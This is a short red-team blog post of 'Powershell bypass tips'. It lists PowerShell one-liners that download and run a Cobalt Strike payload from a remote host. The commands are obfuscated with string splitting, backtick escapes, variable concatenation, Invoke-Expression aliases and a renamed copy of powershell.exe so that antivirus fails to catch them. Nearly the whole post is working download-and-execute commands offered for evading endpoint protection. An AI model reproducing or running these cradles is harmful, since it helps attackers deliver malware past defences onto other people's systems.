Powershell bypass tips

Learning record

Publish Date: 2021-08-11

Update Date: 2021-09-10

Word Count: 428

Read Times: 2 Min

Read Count:

Command EXEC

String Add the &
&“hostname”

IEX()、Invoke-Expression() command exec
IEX("whoami")
Invoke-Expression("whoami")

Cobaltstrike Online

The default payload like this
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))"

Must be kill By AV

How to bypass

The string Split

IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))

IEX ((‘new-’+‘object’ net.webclient).‘downl’+‘oadstring’('http://192.168.159.6:6379/yangsir'))

Substitution variable

Default payload
powershell.exe ”IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))“

replace forward 
IEX ((new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'))

after 
IEX$test=new-object net.webclient; $test.downloadstring('http://192.168.159.6:6379/yangsir')

like this to split the http string
$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://192.168.159.6:6379/yangsir''))

Add an escape character

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).d`own`load`st`ring('http://192.168.159.6:6379/yangsir'))"

Combined use

Very easy to use, but like this payload must be kill again

powershell.exe -nop -w hidden -c "$t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4('http://192.168.159.6:6379/yangsir'')'.Replace('t4','adString');IEX($t1+$t2+$t3)"

powershell.exe -nop -w hidden -c "$t1='IEX ((new-object net.webclient).downl';$t2='oadstring(''http://192.168.159.6:6379/yangsir''))';$t3='$t1,$t2';IEX(-join $t3)"

powershell.exe $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4('http://192.168.159.6:6379/yangsir'')'.Replace('t4','adString');IEX($t1+$t2+$t3)

powershell.exe $t1='IEX ((new-object net.webclient).downl';$t2='oadstring(''http://192.168.159.6:6379/yangsir''))';$t3='$t1,$t2';IEX(-join $t3)

Use alias

BypassAV

powershell.exe set-alias -name test -value Invoke-Expression;test(New-Object Net.WebClient).DownloadString('http://192.168.159.6:6379/yangsir')

Another

powershell.exe set-alias -name name1 -value Invoke-Expression;"$t1='name1((new-object net.webclient).downl';$t2='oannn(''http://192.168.159.6:6379/yangsir''))'.Replace('nnn','dString');$t3=$t1,$t2;$tfin=$t3;name1(-join $tfin)"

Copy PS exec

copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe whoami.txt

whoami.txt set-alias -name name1 -value Invoke-Expression;"$t1='name1((new-object net.webclient).downl';$t2='oannn(''http://192.168.159.6:6379/yangsir''))'.Replace('nnn','dString');$t3=$t1,$t2;$tfin=$t3;name1(-join $tfin)"

Too long command

Also you can use the too long command + copyPS + confusion to Combined use

Yangsir

https://yangsirrr.github.io/2021/08/11/powershell-bypass-tips/

All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !

Redteam Bypass RCE Powershell Cobaltstrike

ADCS&ESC1&ESC8攻击方式

2021-08-16 Learning record

Redteam Domain Environment PTT DPE ADCS ESC1 ESC8

Use IPC BypassUAC

2021-08-08 Tips

Redteam Bypass UAC IPC